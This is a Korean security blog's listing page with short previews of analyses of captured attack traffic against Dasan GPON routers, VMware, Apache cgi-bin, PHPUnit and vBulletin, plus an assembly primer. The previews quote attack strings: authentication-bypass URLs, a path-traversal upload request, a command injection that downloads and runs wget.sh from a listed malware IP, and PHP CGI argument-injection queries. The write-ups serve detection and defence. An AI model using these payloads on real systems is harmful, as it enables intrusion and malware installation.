본문 바로가기

전체 글176

Dasan GPON Home Routers Authentication Bypass (CVE-2018-10561, CVE-2018-10562) 분석 자료 Dasan GPON Home Routers Authentication Bypass (CVE-2018-10561, CVE-2018-10562) 분석 자료Dasan Zhone Solutions 홈 라우터(공유기)에서 발견된 인증을 우회하여 원격 코드 실행이 가능한 취약점 공격2018년에 발견된 취약점이지만 최근(2022년)까지 공격 트래픽이 탐지되고 있음관련 취약점CVE-2018-10561: Request URL에 ?images/ 문자열을 추가하여 인증 우회가 가능함CVE-2018-10562: 인증 우회 후 원격 코드를 실행할 수 있음 취약점 트래픽 예인증 우회/GponForm/diag_Form?images//menu.html?images/인증 우회 & 명령 실행XWebPageName=diag&diag.. 2024. 9. 23.

VMware RCE 취약점(CVE-2021-21978, CVE-2021-21985) 분석 자료 VMware RCE 탐지 취약점CVE-2021-21978 (VMware View Planner)CVE-2021-21985 (vCenter Virtual SAN(vSAN)) CVE-2021-21978 (VMware View Planner)VMware View Planner 4.x 버전에서 원격코드 실행 취약점logupload 웹 애플리케이션을 통해 임의로 파일 업로드가 가능하고,악성 파일을 업로드하여 logupload 컨테이너에서 원격코드 실행되는 취약점영향 받는 버전View_Planner : 4.6 이전 버전취약점 트래픽 [Target IP]/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttp.. 2024. 9. 23.

아파치 웹 서비스 공격 탐지 분석 자료 아파치 웹 서비스 공격 탐지 분석 자료웹 서비스 관련 악성 트래픽IP/Port 스캐닝 행위 및 C&C 서버를 통한 추가 악성 행위 가능탐지 트래픽[Target IP]:80/cgi-bin/;cd+%2Ftmp%3Bwget+http%3A%2F%2F 45[.]95[.]55[.]214%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+Netgear%3Brm+-rf+wget.sh- Apache/cgi-bin 디렉토리에 보관된 스크립트 활용- cd, wget [C&C IP], chmod 등 command를 통한 악성파일 다운로드&실행- 45[.]95[.]55[.]214 IP는 Malware와 관련된 IP로 알려져 있음악성 IP195.178.120[.]33195.178.120[.]41.. 2024. 9. 23.

PHP 취약점 공격 / CVE-2017-9841, CVE-2019-16759 분석 자료 PHPUnit 취약점 / CVE-2017-9841PHPUnit RCE 취약점Util/PHP/eval-stdin.php 를 통해 임의의 PHP코드를 실행할 수 있는 취약점최근까지 탐지되고 있는 취약점 공격이며,이번 공격은 CVE-2017-9841 취약점과 CVE-2019-16759 취약점이 함께 유입되었습니다.탐지된 IDS 시그니쳐 - ETProETPRO WEB_SPECIFIC_APPS PHPUnit Arbitrary Code Execution (CVE-2017-9841) M1WEB_SERVER disable_functions PHP config option in uriWEB_SERVER auto_prepend_file PHP config option in uriWEB_SERVER PHP tags in H.. 2024. 9. 23.

악성코드 고급 분석의 기초 명령어 설명 단순 명령어mov- 단순하고 널리 사용됨, 데이터를 다른 위치로 옮기는데 사용. 메모리를 읽고 쓰는 명령- 형식 : mov 목적지, 소스 (인텔 형식)명령어설명mov eax, ebxEBX의 내용을 EAX 레지스터로 복사한다.mov eax, 0x42값 0x42를 EAX 레지스터로 복사한다.mov eax, [0x4037C4]메모리 위치 0x4037C4에 있는 4바이트 값을 EAX 레지스터로 복사한다.mov eax, [ebx]EBX 레지스터가 명시한 메모리 위치에 있는 4바이트 값을 EAX 레지스터로 복사한다.mov eax, [ebx+esi*4]ebx+esi*4 연산 결과가 명시한 메모리 위치에 있는 4바이트 값을 EAX 레지스터로 복사한다.* mov eax, ebx+esi*4(대괄호 없이) 이런 명령어는 유.. 2024. 9. 23.

vBulletin RCE - CVE-2019-16759 분석 자료 CVE-2019-16759vBulletin 5.x ~ 5.5.4를 사용하면 ajax / render / widget_php 경로 문자열 요청에서 widgetConfig [code] 매개 변수를 통해 원격 명령을 실행할 수 있습니다.최근까지 탐지되고 있는 공격 유형입니다.탐지 악성 쿼리/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, /cgi-bin/php5?-d allow_ur.. 2024. 9. 23.

이전 1 2 3 4 5 6 ··· 30 다음

티스토리툴바